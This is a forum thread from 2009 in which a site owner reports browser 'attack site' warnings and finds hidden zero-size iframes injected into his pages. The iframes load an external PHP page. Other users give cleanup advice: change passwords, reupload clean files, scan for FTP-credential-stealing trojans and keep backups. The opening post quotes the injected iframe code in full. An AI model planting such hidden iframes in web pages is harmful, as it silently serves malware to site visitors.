Reported Attack Site!??

Discussion in 'Google' started by TheLasTSamuRai, Nov 30, 2009.

  1. #1
    Hi
    When i try to access my websites I keep getting this message :
    Reported Attack Site!
    
    
    This web site at mywebsite.com has been reported as an attack site and has been blocked based on your security preferences.
    
      Attack sites try to install programs that steal private information, use your computer to attack others, or damage your system.
    
    Some attack sites intentionally distribute harmful software, but many are compromised without the knowledge or permission of their owners
    Code (markup):
    I have looked throgh my files and i have this iframe in almost all the files of my website:

    <iframe src="http://odile-marco.com/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://odile-marco.com/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://odile-marco.com/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://odile-marco.com/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
    Code (markup):
    I have removed this iframe from one of my website and contacted google and its back within 2 hours .
    How the hell someone can do that? i mean the problem is not getting my websites back but im afraid that he do that again.
    Any idea how someone can do that?
    Thanks
     
    TheLasTSamuRai, Nov 30, 2009 IP
  2. Danielregwan

    Danielregwan Well-Known Member

    Messages:
    398
    Likes Received:
    13
    Best Answers:
    0
    Trophy Points:
    120
    #2
    looks like someone hacked your web hosting, contact your hosting company as soon as possible and let them know what happened and what you found.

    where are you hosted by the way?
     
    Danielregwan, Nov 30, 2009 IP
  3. lcwadminbj

    lcwadminbj Peon

    Messages:
    402
    Likes Received:
    16
    Best Answers:
    0
    Trophy Points:
    0
    #3
    It is very obvious that your site has been compromised.

    You need to change your password and then delete all files from the site and then upload a clean copy of them.

    There is something hidden in one of the files that is recreating it each time you remove it.
     
    lcwadminbj, Nov 30, 2009 IP
  4. malcolm1

    malcolm1 Prominent Member

    Messages:
    7,148
    Likes Received:
    758
    Best Answers:
    0
    Trophy Points:
    310
    #4
    There are many ways to get in and do things and the best advice is change all passwords
    in C panels, Admin panels and anywhere they can get in and make them harder to crack... ;)

    And as always watch whom you give access to your websites to...

    thx
    M1
     
    malcolm1, Nov 30, 2009 IP
  5. TheLasTSamuRai

    TheLasTSamuRai Active Member

    Messages:
    345
    Likes Received:
    5
    Best Answers:
    0
    Trophy Points:
    60
    #5
    Thanks all for those tips, i have never shared my password with anyone :confused:
    I have deleted all those iframes .

    To lcwadminbj : you said "There is something hidden in one of the files that is recreating it each time you remove it. " how can i find this thing? it will be a pain to search all the files .

    I was thinking about those plugins and scripts using ionCube PHP Encoder , they can do that? and if so how to protect myself from being hacked again?
    Thanks
     
    TheLasTSamuRai, Nov 30, 2009 IP
  6. WallaceYeung

    WallaceYeung Notable Member

    Messages:
    3,377
    Likes Received:
    164
    Best Answers:
    0
    Trophy Points:
    230
    Digital Goods:
    1
    #6
    Can you make sure all the installed scripts and plugins are clean?
    Otherwise it's useless whatever you change the password to prevent to be hacked.
    Anyway contact your hosting to see if they can help you to figure out the big problem.
     
    WallaceYeung, Nov 30, 2009 IP
  7. lcwadminbj

    lcwadminbj Peon

    Messages:
    402
    Likes Received:
    16
    Best Answers:
    0
    Trophy Points:
    0
    #7

    As has already been said you need to change ALL your passwords - I recommend using at least a 15 long and preferably 20 long passwords consisting of random characters/symbols -

    If you have plugins then only use ones from reputable sources.
    using IONCUBE costs money so in my opinion the hackers wont bother to encode their nasties using it.


    I had a similar situation and the only solution was to delete all the files in my public_html folder and then upload the site again from the files on my PC using FTP.

    Now I know better and created a system to run an automatic daily backup of my Public_html folders and databases so I can restore a site very fast if it is compromised.

    It is vital to have backups. Even if you think you are not vunerable to attack.
    Hackers will strike anywhere anytime.
     
    lcwadminbj, Nov 30, 2009 IP
    TheLasTSamuRai likes this.
  8. TheLasTSamuRai

    TheLasTSamuRai Active Member

    Messages:
    345
    Likes Received:
    5
    Best Answers:
    0
    Trophy Points:
    60
    #8
    Thanks you for this great post
    This is exactly what i have done , , and i will keep backups for my websites, because this is the second time that happened to me, (the first time was worst :( the hacker deleted ALL my websites)
    but now i have deleted the malware and i have a full buckup
    Thanks again and rep added :)

     
    TheLasTSamuRai, Dec 1, 2009 IP
  9. ads2help

    ads2help Peon

    Messages:
    2,142
    Likes Received:
    67
    Best Answers:
    1
    Trophy Points:
    0
    #9
    ads2help, Dec 1, 2009 IP
  10. DamnTees

    DamnTees Active Member

    Messages:
    111
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    51
    #10
    wow sounds like a rough ride man. Hope things work out for you
     
    DamnTees, Dec 1, 2009 IP
  11. lcwadminbj

    lcwadminbj Peon

    Messages:
    402
    Likes Received:
    16
    Best Answers:
    0
    Trophy Points:
    0
    #11
    Thank you for the rep. Glad that following my instructions helped you solve the problem.
     
    lcwadminbj, Dec 2, 2009 IP
  12. merlinseo

    merlinseo Well-Known Member

    Messages:
    1,686
    Likes Received:
    54
    Best Answers:
    0
    Trophy Points:
    130
    #12
    Ok Simple , here is the real solution

    This is not new , I and Many others must have faced this

    This is because when you must have browsed some website , it must have downloaded Trojan or any other virus.

    Now this Virus , picks the Password and username from your FTP client
    And then they inject this code from there, Usually all index files are affected. In root folder main index or any other folder which has index page will be affected.

    How to get rid of this ?
    You have to have FULL VERSION of Antirvirus , Anyone which you have , I have Norton
    RUN it and you will get the list of affected virus , Click on clean them and they will be deleted
    Once you done above, then go and change your FTP password so it wont get it again

    If you dont clean your PC using Anti virus and just change your FTP password, this would keep coming again . As no one is sharing ur password other then Your very Own PC where virus is actually residing and reading your FTP user/pass.

    Also this is just a injection to index pages only so dont worry With my experience I havent seen other pages being affected. So hope your other pages are safe.

    CLEAN it ASAP . Thats it
     
    merlinseo, Dec 2, 2009 IP
  13. seogoogle

    seogoogle Well-Known Member

    Messages:
    1,258
    Likes Received:
    15
    Best Answers:
    0
    Trophy Points:
    195
    #13
    Same Problem with me change your Permission for Index Files to 444 and If still Virus Attack you have to clean your server completely I have done this and now mine sites save. Also check .htacess file




     
    seogoogle, Dec 2, 2009 IP
  14. gadjr

    gadjr Peon

    Messages:
    104
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #14
    nice solution though. in other word we need to have our antivirus up-to-date. good info and i will keep it as a remainder to me also.
     
    gadjr, Dec 2, 2009 IP
  15. TheLasTSamuRai

    TheLasTSamuRai Active Member

    Messages:
    345
    Likes Received:
    5
    Best Answers:
    0
    Trophy Points:
    60
    #15
    Thanks all for your support , this thread become very informative :) i thing i should learn alot about security , and merlinseo thanks for your post i didn't know there is such a malware that steal FTP logins .
    Thanks
     
    TheLasTSamuRai, Dec 2, 2009 IP
  16. lcwadminbj

    lcwadminbj Peon

    Messages:
    402
    Likes Received:
    16
    Best Answers:
    0
    Trophy Points:
    0
    #16
    Well I thanked TheLasTSamurai for the positive feed back so it is only fair to say thanks to the person that gave me a negative rep and called me an idiot even though they didnt have the guts to say who they were.
    So childish!
     
    lcwadminbj, Dec 3, 2009 IP
    ads2help likes this.
  17. progenic2010

    progenic2010 Peon

    Messages:
    35
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #17
    Maybe it's on you plugins that has the error.. Double check and surely it will run clean after that.
     
    progenic2010, Dec 4, 2009 IP
  18. rob.d

    rob.d Peon

    Messages:
    42
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #18
    This thread is quite old but I have seen this on a couple of different websites recently and there has been an increase in serps / PR rank due to this believe it or not! One site went from pr3 to pr4 not on links but I think due to content - 50 pages indexed before and 400 pages indexed after (although readers cant access the other pages google indexes them). The other site is similar - has anyone else seen this?
     
    rob.d, Feb 9, 2010 IP